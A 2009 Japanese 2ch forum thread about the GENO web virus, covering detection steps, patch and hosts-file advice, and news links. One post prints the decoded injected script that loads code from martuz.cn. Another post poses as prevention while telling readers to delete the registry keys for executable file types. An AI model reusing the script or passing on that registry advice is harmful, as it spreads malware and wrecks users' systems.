GENOウイルススレ　★21

★対処法(GENOウイルスチェッカーのサイトから引用)
■ adobe readerを9.1.1にアップデートする(9.1：9.1.0では駄目)
　 (9.1.0)
　 http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
　 (9.1.1↑,をインストールしてから↓を適用)
　 http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
　 バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます
■ adobe javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ adobe flashplayerを最新版に更新
　 http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
■ FirefoxにてNoscriptを利用
　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す)
　 (sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。)
　 swfのロード、pdfの関連づけ、activeXの無効化がきちんと出来れば問題ないが、IEコンポーネント利用ブラウザでは難しい
　 そのアタリが比較的楽に設定できるOperaはお勧め
■ hostsファイル書き換え
　 hostsファイルに以下の行を追加
　 127.0.0.1 martuz.cn
　 hostsファイルの在処
　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
　 Windows 95/98/MEの場合→「C:\Windows」

■ Vistaの人ははUACをONにする

★GENOウイルスチェッカー、GENOウイルスまとめ
http://geno.2ch.tc/

GENOウイルススレ　★20
http://pc11.2ch.net/test/read.cgi/sec/1243016705/

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

�Bavast!（無料のアンチウイルスソフト）で確認
　　http://www.btfree.info/file.php?action-get.html
　　Code by: 790e3cc3feabad9

�Bsqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。


※従来のテンプレのcmd.exeによる確認は危険


★感染した場合
現状ではクリーンインストールするしかない

うったえてやう

糞テンプレ修正完了

> ■ adobe readerを9.1.1にアップデートする(9.1：9.1.0では駄目)
これも間違いじゃなかったっけ? 9.1.1で修正された脆弱性はGENOウイルスとは無関係
> ■ adobe flashplayerを最新版に更新
> 　 http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
だからこれじゃIEのFlash Playerが更新されないってば

>>1
GENOウイルスチェッカー(アフィリエイトも充実)
ttp://geno.2ch.tc/←　アフィリエイト（Amazon）　↓ソース

<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>

Jane使っている人は
ツール-設定-コマンドで
コマンド名　適当
実行するコマンドに ttp://geno.2ch.tc/index.php?url=$TEXT$LINK
でjaneから検索でチェックできる

-----------------------------
ActiveX　（アクティブエックス）
JavaScript　（ジャバスクリプト）
-----------------------------

どんな脆弱性があってもルーター（FW）と
この２つをOFF（無効）にすれば無敵になれる

メールは

クロネコメールをつかえ

ソフトはフリーソフトは使わず市販のソフトのみつかえ

>>8
"無敵"ではない

自分が知ってる限りでも
・HTML解釈ミスによるクラッシュ(IE)
・HTML解釈ミスによる任意コードの実行(IE)←うろ覚えだが存在した筈
・IIS稼働環境＋IFRAME←推測だが、IISのURIバグで進入され得る可能性がある
・JPEG解釈ミスによるクラッシュ・任意コードの実行(2ch専用ブラウザ、IE、DLファイル経由他)←一時有名になったGDIのバグ
確かGIFでも起きたはず

副作用なしのクラッシュくらいは余裕で起きるし、静的コンテンツの任意コード実行の脆弱性が残ってればいくらでも進入の危険はある

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
起動しない
�Asqlsodbc.chmのファイルサイズの確認を確認する
4.00 KB (4,096 バイト

見事に感染しています。
クリーンインストールしたいのですが、質問があります。
データをUSBに移そうとおもうのですが、移すファイルにGENOが入ってないか確かめたい
のですが、どうすればよいでしょうか？

家族PCが感染してました

1.起動してもexplorerが起動しない(ユーザは一見何も出来ない)
2.CTRL+ALT+DELでタスクマネージャー立ち上げて新しいタスク実行
3.CMD起動
4.regedit.exe > 起動しない

regedit.exe互換ソフトなんてありましたっけ?

↑窓の杜にあっさりありました
　 失礼しました

　まとめサイトみてもクリーンインストールばかりだったので
(そのほうが安全だけどね)
　対処療法例のひとつとして..

>>14
対処療法にもなってないけどねｗ

>>14
除去してねーしｗｗｗ被害広げる前に、クリーンインストールしとけよ。

中古パソコンとパソコンパーツの通販ショップGENO

www.geno-web.jp/

↑
2chのコピペブログを徘徊してたらＧＥＮＯのサイトが勝手に立ち上がってた
ＧＥＮＯリンクをクリックした覚えは無く沢山タブ開いてたからどこの何が原因か分かりません
こちらのPCに感染らしき症状は見られずここ一週間で2回発生
こんなことってあります？

それマジで早急に精神科で見てもらった方がいいぞ

>>17
勝手に広告のウィンドウが開くのと同じ仕組みを利用して
感染させようとしている奴がいるのでしょ。

クリックしたのを忘れてるんだろ

疑わしい症状を発症したけれど…

勝手にAcrobatReaderが立ち上がってる。
メモリバカ食い。
CPU使用率90%
トレンド、マカフィー、シマンテックのHPが見れない。

最新定義でウィルススキャン→検知せず。
システムの復元で発症一か月前に復元。
再度ウィルススキャン→検知せず。
症状が回復する。

GENOに感染したと思うんだ！だが、システムの復元で回復してるんだ！
事後だけど感染の確認方法をしてみたら異常はないんだけれど、
念の為、PCをクリーンインストールした方がいいだろうか。。。

力説するくらいならそのままで良いんじゃないの
多分大丈夫って意見が欲しい書き込みにしか見えないし

>>21
前スレの最後の方読んだ？
システムの復元だけじゃsqlsodbc.chmのサイズが
感染前に戻らない（＝ウイルス消えない）
経験談が出てるよ
念の為でなく、真面目に駆除したかったら
クリーンインスコしましょう

それか、この際とことん実験する気あるなら
ホストファイルのlocalhost以外のip
全削除した状態で最新パターンファイルに更新した後
ウイルスチェックして削除できるか見てみてよ
報告よろしこ

何がなんだかわからんやつは前消し

訂正
×　localhost以外
○　localhost以下の行（localhostの行は残す）

今、前スレ読んできた…。
クリーンインストールしてみるよ。
ありがとん。

結局この騒動はなんだったんだろう

キャッシュを消しただけではどうにもならないということを学びました

>>1
おい！！せっかくテンプレ修正してたのに！！


★5月27日現在、沈静化しています。


★GENOウイルスチェッカー、GENOウイルスまとめ
http://geno.2ch.tc/


★対処法(GENOウイルスチェッカーのサイトから引用)
■ adobe readerを9.1.1にアップデートする(9.1：9.1.0では駄目)
　 (9.1.0)
　 http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
　 (9.1.1↑,をインストールしてから↓を適用)
　 http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
　 バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます
■ adobe javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ adobe flashplayerを最新版に更新
　 http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe

■ Operaでプラグイン、Javaをオフ(JavaScript単体では全く安全です。)
　 1.[F12]を押す→[プラグインを有効にする]のチェックを外す)
　 2.[F12]を押す→[javaを有効にする]のチェックを外す)
　 (sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。
　 この方法だと便利なJavaScriptを犠牲にせず、簡単に安全なブラウジングが実現できます
　 さらに、QuickTimeなどの未知の脆弱性にも対処できます)

■ Vistaの人ははUACをONにする

★症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★感染確認方法
�@regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとレジストリエディタが立ち上がらない。
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。

�Asqlsodbc.chmのファイルサイズの確認を確認する
　Windows XP,Windows 2000にて、
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes

※従来のテンプレのcmd.exeによる確認は危険
※従来のテンプレによるとWindows 2000ではsqlsodbc.chmが無いことになってるが
　 .NET framework等にくっついてインスコされる

★GENOウイルス感染からの復帰方法
(当方、この対処法について全く確認していません。自己責任でお願いします。)
1.C:\WINDOWS\Prefetch 内を全部削除
2.[Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
3.スタートアップに何も書かれていない行があったのでチェックをOFF
4.再起動
5.C:\WINDOWS\System32\sqlsodbc.chm を削除　→　復活しないことを確認
6.正常なsqlsodbc.chm(http://www1.axfc.net/uploader/Sc/so/2780)に差し替え

>>30
>>7
アフィチェッカー

しつこい

久々にきたら21になってて腰抜かした

よく考えたら10分前にもきてた

友達にどのプロバイダー使ってるか聞いたらさ、「教えぬ！」って言うわけよ。
ちょっとカチンと来たけど我慢してもう一度聞いたら、「だから教えぬ！」だってさ。
あんなに頑固な奴だとは思わなかったぜ

ocn

plala

eooooooooooooooooooooooo

■FireFox のリンク先読み機能を無効にする

about:config
network.prefetch-next　→　false

テンプレみて感じた事
>>1
火狐厨乙
>>7
アフィ厨乙
>>30
Opera厨乙

>>7
アフィチェッカーうぜぇ
GENOと共に死ね


ちなみにAmazonのアフィ

geno2chtc-22

geno2chtc

推奨NGワード　「アフィ」　「チェッカー」　「厨」

>>44
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::。:::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::。::::::...... ...　　 --─-　　:::::::::::::::::::: ..::::: . ..::::::::
:::::::::::::::::...... ....:::::::゜::::::::::..　　 （___ ）（___ ）　::::。:::::::::::::::::　゜.::::::::::::
:. .:::::。:::........　.　.::::::::::::::::: _　i/ ＝　＝ヽi　:::::::::::::。::::::::::: . . . ..::::
:::: :::::::::.....:☆彡::::　　　／/[||　 　 」　　||]　 ::::::::::゜:::::::::: ...:: :::::
　:::::::::::::::::: . . . ..: ::::　/　ﾍ　| |　 ____,ヽ | |　:::::::::::.... .... ..　.::::::::::::::
::::::...゜　.　.:::::::::　　／ヽ ﾉ　 　 ヽ＿＿/　　.......　.　.::::::::::::........ ..::::
:.... .... ..　.　　　　 く　 /　　　 　三三三∠⌒＞:.... .... ..　.:.... .... ..
:.... .... ..:.... .... ..... .... ..　.:.... .... ..　..... .... ..　..... ............. ..　.　........　......
:.... . ∧∧　 　∧∧　　∧∧　 　∧∧　.... .... ..　.:.... .... ..... .... ..　.
... ..:（　　 ）ゝ （　　 ）ゝ（　　 ）ゝ（　　 ）ゝ無茶しやがって… ..........
....　 i⌒　/ 　 i⌒　/ 　i⌒　/ 　 i⌒　/　..　..... ................... ..　.　...
.. 　 三　 | 　 三　 | 　 三　 | 　 三　|　　... ............. ...........　.　.....
...　 ∪ ∪ 　 ∪ ∪ 　 ∪ ∪ 　∪ ∪　............. ............. ..　........　...
　　三三　　三三　　三三　　　三三
　三三　　三三　　三三　　　三三

ググるのは危ないって本当ですか？
一応ヤフーで検索してるけど不便で

チェッカーをNG入りさせるとソースチェッカーとかのレスも消えるからやだ

ここまで感染無し

>>46
マジウソ

気づいていないだけだったりして

ググる先生が気になるなら念のため、先読み無効にしておけば問題なし

sqlsodbc.chmのファイルサイズ確認って、
このファイル名で検索して出てきたサイズ見るだけじゃダメなの？

>>49>>51
>>41の対策しました、ありがとうございます

検索でやってみた。　

sqlsodbc.chm

サイズ　49.5 KB (50,727 バイト)

ディスク上のサイズ　52.0 KB (53,248 バイト)

つまり検索では確認手段として十分とは言えないって事なのか

どうして「従来のテンプレのcmd.exeによる確認は危険」なんですか？
もう何度かやったんですけど…

sqlsodbc.ch_

BASHO=I386

COPY

SYSTEM32

RENAME

sqlsodbc.chm

RESTART

「姿を変えて検出回避」「攻撃サイトは閉鎖」、最新Webウイルスの詳細
シマンテックが緊急説明会、「別の攻撃サイトが出現する恐れあり」
http://itpro.nikkeibp.co.jp/article/NEWS/20090526/330708/

特に目新しい情報はなさそうだけど貼っとく

アフィリンク復活させやがった
shine

予防策
レジストリエディタを開いて、以下のキーを全て削除して、再起動
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
上記のキーはウィルス・スパイウェアを活動させます

せっかくテンプレから外してたのに

コピペでクレジットの情報とかも抜かれるって読んだんだけど本当？
インターネットウォッチとかの記事読む限りFTP関係しか書いてないんだが

しらん

>>54
俺もサイズ　49.5 KB (50,727 バイト)だったけど大丈夫ってことだよな？

>>64　調べたが問題ないみたいだ　たぶんｗｗ

>>64
今後の予防に
>>60を実行してください

>>54
容量的には正常
更に気になるならハッシュ値の確認をどうぞ

正常なsqlsodbc.chm
ファイルサイズ：50,727バイト
CRC32：B61C7A80
MD5：F639AFDE02547603A3D3930EE4BF8C12
SHA-1：FBDD32ED13D27E4102621E1067FDF3634F33B2C3

もういいや
後はAVGちゃんが何とかしてくれるに決まってるもん

すまん教えてくれ。
そもそもGENOのサイトが改竄されたのは、ハッキングなの？

サイトの管理者がネットでいかがわしい所に行ったPCで踏んできたんじゃない？

じゃなくて 踏んできたPCでサイト更新したからじゃない？

踏んできたPCで更新かけても、
ファイル転送がSFTPだったら暗号とけなくて
ウイルス涙目？

>>56
GENOじゃない他のウイルスでそれ起動させると悪化するやつがあるとかってどっかのスレで見た
自分もよく知らないけど健康なPCなら起動させても問題ないんじゃないの

Returnilを使ってればGENOを踏んで感染しても、
OSを再起動した時点で「感染しなかった事になる」
再起動後、パスワードを変更するだけでおｋ。


【仮想化】Returnil Virtual System【仮想化】
http://pc11.2ch.net/test/read.cgi/sec/1202337108/

�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
両方とも起動

�Asqlsodbc.chmのファイルサイズの確認を確認する　
↑いまこれを確認してるのですが、
cmd.exeの真っ黒い画面に「dir C:\WINDOWS\system32\sqlsodbc.chm」と打ち込んでも
ファイルが見つかりませんと出ます。

Vistaだからでしょうか？

>>70
現時点でGENOからの説明は一切ないっぽい。
もし犯人がショッピングサイトだと知っていてハック＆改竄したのだとしたら、
それこそクレカ情報とか心配だな。

GENOウイルス騒動で再考するマルウェア対策 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0905/27/news007.html

　感染活動による攻撃者の狙いは、
ユーザーを詐欺サイトへ誘導する目的で検索エンジンの結果を書き換えたり、
不正広告を配信したりすることや、詐欺的ソフトのインストール、
個人情報の盗難、バックドアのインストールなどがあるとみられる。
いずれの場合でも、金銭やボットマシンの確保といったサイバー犯罪の流行に沿ったものである可能性が高い。

　シマンテックセキュリティレスポンスの林薫主任研究員は、
「こうした攻撃では自動化された攻撃ツールを使われるのが一般的だが、
今回は人海戦術によってち密な計画で仕掛けられた可能性がある」と推測する。

GENO伝説ここに始まる。一気に全国区へ。

>>56
その書き込みをどこで見たのかわからんがWikiに載ってるまま指摘ないんだし問題ないよな…？
というかかなりの数の人がcmd.exeで確認しただろうしそれが危険だとしたらやばいと思うが

本当にこのGENOウィルスは豚インフルの感染の広がりと同期してるんじゃないか
また冬に再流行とか止めてくれよ

Vista使えよ馬鹿？

>>74
>>80
そうですか。ありがとうございます。
今は大丈夫ですが、>>3と>>31に書いてあったので気になりました。

ウイルスじゃなくても情報が漏れることあります

【情報流出】楽天、利用者のメールアドレスを含む個人情報を「1件10円」でダウンロード販売していることが判明
ttp://tsushima.2ch.net/test/read.cgi/newsplus/1243424409/

xp→windows7

vistaはスルー

>>1はなんでわざわざ古いテンプレを使うの？
アホなの？バカなの？死ぬの？

>>84
今更、何を
楽天では昔からのデフォ仕様（暗黙の了解、自己責任）
っていうか、ネットのショッピングモール自体がどこも似たような事をやってる
まー、通販ではカード決済は出来るだけ避けろってこった

「通常購入データ.csv」「オークションデータ.csv」「プレゼントデータ.csv」「共同購入データ.csv」「資料請求データ.csv」
「商品問合せデータ.csv」となっており、名字・名前・郵便番号・住所・電話番号・ニックネーム・
メールアドレス・クレジットカード番号・クレジットカード名義人・クレジットカード有効期限といった各種個人情報が記載されています。

ネット通販だけでこれだけ情報売られるのか‥

アマゾンもアウトかしら
タダで渡して売ってないから法的にはセーフ？
このタイミングでこの告発ってのは厚労省に睨まれた結果なんだろうけど

>>76
vistaは sqlsodbc.chm の場所が違います。

C:\Windows\Help\mui\0411\sqlsodbc.chm

気が済むまでチェックするよろし。

>>66
初心者はレジストリいじるなって言われたんですが大丈夫でしょうか

>>91
いじらない方がいいと思う

>>92
了解です、ありがとうございます

普段使ってるアカウントの方は壷使えなくなった上すごい重くてネットできない
だから別のアカウント使ってるんだけどタスクマネージャ見てたらプロセスがやけに少なくなってる
７つしかないよ。さっきはこれの４倍くらいあったのに

クリーンインストールしたいけどネットの設定を戻せる気がしない

>>85
勘違いする初心者が続出しそうな予感

a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)
&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)
&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}

>96はデコードしたスクリプト
NT6とChromeは特別扱いらしい

いまさらいきなりなに

16日にはデコードされていたスクリプト
見た瞬間分かるような情報
いったい何がしたかったのか

fc2、記事書いて全ユーザーにメールで注意したみたいだ
ついでにFTPの仕様も変えるみたい
http://blog.fc2.com/info/blog-entry-378.html
http://blog.fc2.com/info/blog-entry-379.html

>>89
アマゾンはほしいものリスト経由の個人情報流出事件が記憶に新しい
yahooも当然、前歴あり
ネット通販は、ある程度の流出は仕方ないくらいの認識じゃないとやっていけないよ

vistaでよかったわ

vistaでよかったと思える時が来るなんて思わんかった

なんだか可哀そうだぞｗ

>100

テンプレートが改竄されてた事には触れてないな

関係ないけど、いまだに改竄を一瞬「かいそ」と読んでしまう。

わかってるねん、わかってるねんで？

関係無いけど、きじゃくせいって「既知の脆弱性」の略だと思ってた

…どうした？

>しかもさまざまな亜種が存在、アンチウイルスソフトのアップデートでの完全対応は難しいのが現状です。しかし、不正侵入検知機能（IPS）を備えた統合セキュリティソフトでは、これらの被害を防げるのです。
断言しているけど大丈夫か？
tp://shop.vector.co.jp/service/special/security/

>>108
なんだ知らなかったよ
JSをオフらなくてもソフトのIPSが防いでくれてたのか
一応ウイルスにかかった形跡もなかったから問題ないな

ところでavastとaviraもIPSって付いているのか？

>>100
FC2のブログとHPのサービス他4つ利用してるけどメール来ない…

>>110
ウイルスセキュリティゼロは付いていたっぽい
防御機能してたか知らんけど…

Vista＋ UACにして適当な>>108を入れて
FIREFOX＋NOSCRIPT＋先読み無効
まめなうｐデートで超おｋなん？

でもショップGENOはどうやってウイルスにかかったんやろ？
アドベのアップもしなかったくらいだからノーガードやったかもな

>>113
しらねーよｗ
GENOはキャッシュ消せば治るとほざいてたくらいだから無防備仕様じゃろｗ

海外のeroticサイトでもみてたんだろか

>>111が何気にゲンキがない
病気やったんやろか

�dフルエンザにかかっても2日以内に
タマゴ酒のめば直る

>>60やったらぶっ壊れた

書き込み出来てるじゃねぇか。
ちなみにscrファイルを書き換えさせてるわけではないので、regedit.exeをregedit.scrにリネームして復元するべし。

>>60
って誰でもあるの？削除して大丈夫なの？

誰でもある。
削除したらだめ。

楽天がメールアドレス含む個人情報を「1件10円」でダウンロード販売していることが判明 ★2
http://tsushima.2ch.net/test/read.cgi/news/1243425827/

Genoウイルスの感染メカニズム【前編】（Scan） - Yahoo!ニュース
（5月27日18時38分配信）
http://headlines.yahoo.co.jp/hl?a=20090527-00000010-vgb-secu

自動アップデートが無効になってオーディオデバイスが無しになってマイクロソフトとか特定のサイトにアクセスできなくなるんだけどこれって感染してる？

>>124
>>1

hosts

失礼
hostsファイル開いてみそ
127.0.0.1localhost
（127.0.0.1をローカルホストにする）
の記述の後に、
マイクロソフトやアンチウィルス系の
ドメインごちゃまんと追加されてるよ、きっと

ようつべの動画にリンク貼ったりしない方がいいのでしょうか

つべやにこにこは、ほぼ最新ver.のFlash Player
でないと見られないんじゃないかな
逆に言うと、見られる人はFlash Playerから
感染する可能性が少ない
投稿された動画自体が汚染されてる可能性は、
自分にはわからない

問題はacrobatよな
告知情報見るまで、acrobat readerにjs使えるなんて
知らなかったものw

>>129

ありがとうございました。

こう言う自己判断できない屑が動画サイト使うから動画サイト＝キチガイと厨の巣、犯罪者予備軍の巣と言う感じ

日本は、いやアジアは、いや地球はキチガイと厨の巣、犯罪者予備軍の巣だな

>>132
あなたの祖国と日本を一緒にしないでいただきたい

>>60やったらregeditやcmdが起動しなくなりました
さらにexplorerも起動しなくなりデスクトップには壁紙だけしか表示されなくなりました
osはvistaです

ちなみにデスクトップの壁紙は外人ニューハーフの裸体（完全無修正）で
アイコンをぎっしり詰めて分からない様にカモフラージュしてました

12点

自己解決しました。

次スレいらないな。

GENO社員乙

携帯でGENOウイルスのＵＲＬ踏んじゃったんだけど、
携帯にも影響あるの？

>>139
クリーンインストール

おいおまいら

俺のケツの穴見たいか？
糞ひねり出すとこ見たいか？

>>140
え、あるの・・・？
データ流出とかはないよな・・・

>>142

＞ >>140
＞ え、あるの・・・？
＞ データ流出とかはないよな・・・

cmc確認、regedit確認、sqlsodbc.chmのファイルサイズ確認
nortonは普通に起動している、windowsupdateにもアクセス可能。
symantecにもアクセスできる。MD5も一致した。

問題なしですよね？

asahi.com（朝日新聞社）

新マルウエア「ＧＥＮＯウイルス」蔓延に注意（1/3ページ）
ttp://www.asahi.com/digital/digitre/TKY200905250299.html

いまだに騒いでるのは同人屋だけだと思ってた

>>144
不安があるならクリーンインストール

「ＧＥＮＯウイルス」

朝日新聞社のお墨付き

>>144
そこまで確認して不安ならOS再インスコ汁

終了

まだまだ続くよ〜！

Windows2000の場合でも、
Visual Studio 6 SP5 以降のバージョン、Microsoft SQL Server 2000、.NetFramework 1.1
等がインストールされている場合にはMDAC 2.6〜2.8 がインストールされているので
sqlsodbc.chm が存在する。
Office 2003をインストールしている場合もsqlsodbc.chm が存在してる可能性が有り。


通常は、Windows2000には同じsqlsodbcでもchmファイルではなく、 hlpファイルが常時存在し、
こちらは16.7 KB (17148 バイト) 、MD5:3177C8154F1011535FDD1B1B30D3D2E9

50727バイトじゃない！MD5:F639AFDE02547603A3D3930EE4BF8C12じゃない！感染してる！
と勘違いしてクリーンインストールしちゃった人が多そう･･･

>>152
chmファイルとhlpを見間違うのはマヌケ
クリーンインストールも止むを得なす

cmd、regeditが起動できてsqlsodbc.chmも改変されてなくて
特定のサイトにアクセスできないんだけどこれって感染してる
あと隠しファイルも表示できない

>>154
あたしエスパーだけどOS入れなおせばおｋ

今やってる

>>154
面倒だからOS再インスコ

さっきまで、まとめサイトのメニューに「稲川淳二」って項目があったけど、なんだったんだろう。

>>158
なにそれ？ｗ　なんで稲川淳二が・・・

バスターがアップデートできないんだけど…
これもGENO？

>>154
以前からそうならルータの問題の可能性も有

先週再インスコした時は平気だった

>>160
聞く前にちゃんと自分で調べようぜ！

>>160
期限切れてるんじゃね

新マルウエア「ＧＥＮＯウイルス」蔓延に注意（1/3ページ）
ttp://www.asahi.com/digital/digitre/TKY200905250299.html

GENOウイルス何って4月ごろに騒いでた奴だろ？

亜種も出て随分たってるのに
いまだに新マルウエアとか言ってるのか…

>>154
会社でフィルタリングかけてんじゃね

はいはいhostsファイル見て
トレンドマイクロがブロックされてたら
削ってね〜

終わったね

まだまだ続くよ〜！
と言いたいけど終わったね

今回を機にセキュリティーに目覚めたっつか、自分のＰＣを見つめ直す
機会にはなったんじゃないかな
操ってるのはあくまでも『人間』なんだしな

obfuscationがさらに高度になってきてるな

そうかそうか

ヴィスタだけどCPU使用率が異常なことになってる
これやばくないか

低スペック+AERO有効

ははっ　わろす

いや今まで使用率なんて何も触ってなけりゃ３％前後なのに
常にコア１が９０％ぐらいになってる

見に覚えがないなら（UAC無視してないなら）
sqlsodbc確認、ウィルススキャン＆HijackThisのようなソフトで起動プロセスチェックして
問題なければ再起動して様子を見る

アンチウィルスFWソフトもたまに暴走するからな
例えば、ウィルスバスターとかウィルスバスターとかウィルスバスターとか！

バスターは自分をバスターし始める

ウィルスバスターかもしれんｗ

>>178
sqlsodbcってVistaに存在してる？

>>181
>>90

システムファイルの発見はCドライブごと検索するようこころがけるだけでこんなつまらんレスはなくなるだろう

始まったな

>>131
お前は人間失格だな
少しは>>127さんを見習え

掘り返すなよ・・

いやあ、俺の発見したサイトはユーザーブロッキング機能によって
2度目の攻撃は行わないようになってたわ
察知されにくいようにしてるな

ウイルスバスターって人気ですね！

人気ですが、何か

バスター？

妨害攻撃で撃沈されてしまうけどね

いやあ、入手した検体アンチオンラインスキャン、アンチリバースエンジニアリング、
アンチVMなどのアンチ仮想環境すべてかかってるわ

感染して、先ほどリカバリした漏れです。

ふと思ったんだけれど、ファイアウォール導入してもGENOには無効？

終了

ｐ

>>192
うん、無効

HIPS入れてかろうじて何とかなるかならないか

誰でも出来る簡単な対策

Vista使いましょう

つーか、使ってるAdobeを最新にしていればとりあえず今は大丈夫なんでそ？

あとjsの無効
jsでとばされる先の感染サイトがあったドメインへの
アクセス制限（暫定）

それは、Adobe Readerのjavascript設定限定での話？
それともブラウザ自体のscriptも常時切らないと駄目なのか（切らないと完全アウトかどうか）？

>>199
>>1

テンプレは特定のブラウザの導入とPDF、flashとjsの無効を推奨しているように見えるし不便過ぎる（firefoxが何たらの項。）
もう感染してもいいから自分のお気に入りのサイトくらいは許可するよ
楽天で個人情報既に抜かれてるし自サイト（ブログ放置くらい）、カードないし別にいいや

>>199
現在のところはAdobe Reader側だけでOK。
ブラウザ側も保険として勧められているだけ。

Genoよりエロゲ規制の方が数倍恐いわ

ここ　↓　やられてるのかな？反応して遮断するんだけど、「ハリスの太さ」で検索してたらあった。

グレ、チヌの視力でハリスは見えるのかとマキエの摂取量
ttp://www.geocities.co.jp/Outdoors-Mountain/8003/gure_tinu-siriyoku.htm

>>204
やられてるねえ
martuz●cn行き

martuzは停止してるんじゃなかったっけ

たぶんね
改竄されてるかどうかとは関係ないけど

そうなんだ、やられていたか
俺みたいに行動範囲の狭い人間ですらぶち当たるってことは
相当ひどいってことだな
こりゃ気をつけにゃいかんわ
ありがと

見つけたんだったらここで報告するより
